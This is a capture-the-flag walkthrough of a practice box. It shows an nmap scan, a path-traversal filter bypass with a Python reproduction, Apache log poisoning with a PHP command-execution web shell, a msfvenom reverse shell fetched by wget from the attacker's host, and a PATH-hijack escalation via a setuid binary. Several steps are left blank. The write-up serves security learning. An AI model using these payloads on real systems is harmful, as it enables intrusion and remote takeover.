```
# Nmap 7.91 scan initiated Mon May 10 10:54:40 2021 as: nmap -sSVC -p- -oA nmap_full -v 10.10.67.93
Nmap scan report for 10.10.67.93
Host is up (0.070s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9f:1d:2c:9d:6c:a4:0e:46:40:50:6f:ed:cf:1c:f3:8c (RSA)
|   256 63:73:27:c7:61:04:25:6a:08:70:7a:36:b2:f2:84:0d (ECDSA)
|_  256 b6:4e:d2:9c:37:85:d6:76:53:e8:c4:e0:48:1c:ae:6c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Wavefire
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 10 10:57:17 2021 -- 1 IP address (1 host up) scanned in 156.44 seconds
```
We get the following base64 string: `PD9waHAgZWNobyAnQ29udHJvbCBpcyBhbiBpbGx1c2lvbic7ID8+Cg==`
which decodes to `<?php echo 'Control is an illusion'; ?>` followed by a newline.
Let's try it on test.php.
```php
        echo 'Sorry, Thats not allowed';
    }
}
?>
</div>
</body>
</html>
```
The code checks that the path we provide contains /var/www/html/development_testing
and does not contain the string ../.., which is meant to block path traversal. But it is a plain
substring check, so it is bypassable: inserting the no-op ./ between the two .. components turns
../.. into .././.., which the filter no longer matches but which the filesystem still resolves to
the same parent directory.
The full URL to read /etc/passwd would be:
PS: The base64 filter is only needed for PHP files, so that they are returned as source instead of being executed; text files can be read directly. It also has to be off for the log inclusion later on, otherwise the injected PHP would be encoded rather than executed.
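To make the bypass concrete, here is a small Python reproduction of the substring check described above, run against a few candidate values for the `view` parameter. This is an added example, not the PHP from the box: the two substring conditions are taken from the description above, the candidate paths and the `wrap_base64` helper (the standard `php://filter/convert.base64-encode` wrapper) are assumptions for illustration, and `posixpath.normpath` stands in for the kernel's path resolution.

```python
import posixpath

# Reproduction of the check test.php applies to ?view= (constructed for this example,
# not the page's PHP): the value must contain the development_testing directory and
# must not contain the literal substring "../..".
ALLOWED_DIR = "/var/www/html/development_testing"
BLOCKED_TOKEN = "../.."


def filter_allows(view: str) -> bool:
    """True when the substring checks would let include($view) run."""
    return BLOCKED_TOKEN not in view and ALLOWED_DIR in view


def resolves_to(view: str) -> str:
    """Path the filesystem actually opens: normalisation collapses '.', '..' and '//'."""
    return posixpath.normpath(view)


def evaluate(view: str):
    """(passes the filter?, file that would really be opened)"""
    return filter_allows(view), resolves_to(view)


def wrap_base64(view: str) -> str:
    """php://filter wrapper to read a PHP source file as base64 instead of executing it.
    The resource part still contains ALLOWED_DIR, so it passes the same filter."""
    return "php://filter/convert.base64-encode/resource=" + view


# Candidate values for ?view= (constructed). /etc/passwd is four directories above
# development_testing, so four '..' components are needed.
CANDIDATES = {
    "naive": ALLOWED_DIR + "/../../../../etc/passwd",            # contains "../..": blocked
    "dot_slash": ALLOWED_DIR + "/.././.././.././../etc/passwd",  # "./" breaks the token
    "double_slash": ALLOWED_DIR + "/..//..//..//../etc/passwd",  # "//" breaks it as well
}

if __name__ == "__main__":
    for name, view in CANDIDATES.items():
        allowed, target = evaluate(view)
        print(f"{name:13} allowed={str(allowed):5} opens={target}")
    print(wrap_base64(ALLOWED_DIR + "/test.php"))
```

All three candidates normalise to the same file; only the first one contains the blocked token. The lesson for the defender is the usual one: canonicalise first (`realpath`) and then compare the result against an allow-listed directory, instead of pattern-matching the raw input.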
The Apache access log records the request line and the User-Agent header, so we can poison the log through the User-Agent.
```shell
$ curl http://mafialive.thm/ -A "<?php system(\$_GET['cmd']); ?>"
```
PS: The log escapes double quotes, so use single quotes for strings inside the PHP payload. Since the curl argument itself is in double quotes, escape the dollar sign so the shell does not try to expand $_GET.
Then we include the log again and append &cmd=id to execute a command.
Note: at some point just reset the box; after the fuzzing in the previous steps the log will be very long.
We can see the command result has replaced the PHP payload:
```shell
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=10.9.19.77 LPORT=9999 -f raw > agent.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 34277 bytes
```
Then start an HTTP server to serve the file:
```shell
$ ruby -run -e httpd . -p 8888
[2021-05-10 12:06:29] INFO  WEBrick 1.7.0
[2021-05-10 12:06:29] INFO  ruby 3.0.1 (2021-04-05) [x86_64-linux]
[2021-05-10 12:06:29] INFO  WEBrick::HTTPServer#start: pid=55053 port=8888
```
Then we request the log file with cmd=wget http://10.9.19.77:8888/agent.php.
```
   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (php/meterpreter_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.19.77       yes       The listen address (an interface may be specified)
   LPORT  9999             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.9.19.77:9999
```
## Elevation of Privilege (EoP): from www-data to archangel
There is a cronjob calling a custom script:
```shell
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
```
Then we start a listener and wait for the incoming connection:
```shell
pwncat -lvv 8888
INFO: Listening on :::8888 (family 10/IPv6, TCP)
INFO: Listening on 0.0.0.0:8888 (family 2/IPv4, TCP)
INFO: Client connected from 10.10.244.190:55584 (family 2/IPv4, TCP)
bash: cannot set terminal process group (1059): Inappropriate ioctl for device
bash: no job control in this shell
archangel@ubuntu:~$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)
```
## Elevation of Privilege (EoP): from archangel to root
Now that we are logged in as archangel, we can read the secret folder:
```shell
archangel@ubuntu:~$ ls -lh secret
total 24K
-rwsr-xr-x 1 root root 17K Nov 18 16:40 backup
-rw-r--r-- 1 root root  49 Nov 19 20:41 user2.txt
```
The backup binary is setuid root (it seems to exist so that archangel can write a backup
into /opt), but it calls cp by its bare name instead of an absolute path. The lookup therefore
goes through our PATH, so we can put a cp of our own first in PATH and have the root-owned
process execute it.